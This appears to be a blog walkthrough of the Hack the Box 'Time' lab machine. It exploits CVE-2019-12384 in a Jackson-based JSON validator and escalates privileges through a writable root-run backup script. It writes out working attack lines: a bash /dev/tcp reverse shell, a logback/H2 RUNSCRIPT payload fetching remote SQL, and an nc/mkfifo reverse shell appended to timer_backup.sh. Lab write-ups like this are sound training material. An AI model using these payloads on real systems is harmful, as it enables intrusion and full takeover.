Hello! Everyone and Welcome to yet another CTF challenge from Hack the Box, called ‘Time,’ which is available online for those who want to increase their skills in penetration testing and Black box testing.
Level: Medium
Task: Find user.txt and root.txt in the
victim’s machine
Penetration Methodologies
- Scanning
·
Nmap
- Enumeration
·
Browsing HTTP service
·
Enumerating Json beautifier and validator
- Exploitation
·
Exploiting
com.fasterxml.jackson.core
·
Linpeas to search for
possible paths to escalate privileges
- Privilege Escalation
·
Uploading reverse shell in
timer_backup.sh
- Capturing the flag
Walkthrough
Network Scanning
Let’s get started then!
To Attack any machine, we need the IP Address.
Machine hosted on HackTheBox have a static IP Address.
IP Address assigned to Time machine: 10.129.148.206
Let us scan the VM with the most
popular port scanning tool, nmap to enumerate open ports on the machine
nmap -A 10.129.148.206
From the result above we found two working ports
on the VM, port SSH(22), HTTP(80).
Since we don’t
have the credentials for the SSH so we cannot enumerate it. The only service
that is left is the HTTP service.
Enumeration
Starting with the
HTTP service, we try to enumerate by accessing the IP Address of the target
machine on a Web Browser. We see a website that features online Json
beautifier and validator.
We put something simple in beautifier to test and
we received a message saying “null”.
So, we checked dropdown and there we saw
validator function which is in beta and while giving a input we received an
error related to com.fasterxml.jackson.core.
Next we did some research and on google we found
a script which can be used to exploit com.fasterxml.jackson.core and is available
on github repository.
https://github.com/jas502n/CVE-2019-12384
As you can see in the image below, we cloned
the repository to our local machine and to get reverse shell we need to edit
the last line of the code in inject.sql file.
git clone
https://github.com/jas502n/CVE-2019-12384.git
Getting user shell
We created a simple bash reverse shell script
and added to our inject.sql file.
bash -i >& /dev/tcp/10.10.14.108/1234
0>&1
Next, we started python one liner SimpleHttpServer
in our local machine to transfer the file from our machine to victim machine.
python -m SimpleHTTPServer
We went to the function validate beta and
entered the following payload which we got from git repository into the input
field and then clicked process.
["ch.qos.logback.core.db.DriverManagerConnectionSource",
{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT
FROM 'http://10.10.14.108:8000/inject.sql'"}]
Next, we started netcat listener on port 1234
in other terminal which gave us reverse shell of the user pericles.
nc -lvp 1234
cd /home
ls
cd /pericles
ls
cat user.txt
So, to exploit further to get root shell, we uploaded
linpeas from local machine to victim machine, the script will look for possible
paths to escalate privileges.
cd /tmp
wget 10.10.14.108:8000/linpeas.sh
chmod 777 linpeas.sh
./linpeas.sh
Privilege Escalation
The result below from linpeas tell us that
linpeas found a script timer_backup.sh which is present in /usr/bin directory
and is writable by normal users.
So, we quickly checked the timer_backup.sh which
is read, write and executable but when we tried to execute the script it gave
us error. So, it means that the file is only executable by root user and
everything added to the script will get executed by root privilege.
We added our reverse shell payload inside the
timer_backup.sh file which get executed by root privilege.
echo
"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc
10.10.14.108 4444 >/tmp/f" >> /usr/bin/timer_backup.sh
Getting root shell
We started netcat listener in one window of
local machine.
Since the script is executed by root in every
5-10 seconds so next time it executed, we will get the shell.
So here the privilege escalation is due to the
unwanted file permission given to normal user.
nc -lvp 4444
cat /root/root.txt
Author: Prabhjot Dunglay is
a Cyber Security Enthusiast with 2 years of experience in Penetration Testing
at Hacking Articles, Ignite technologies. Contact here.
0 comments:
Post a Comment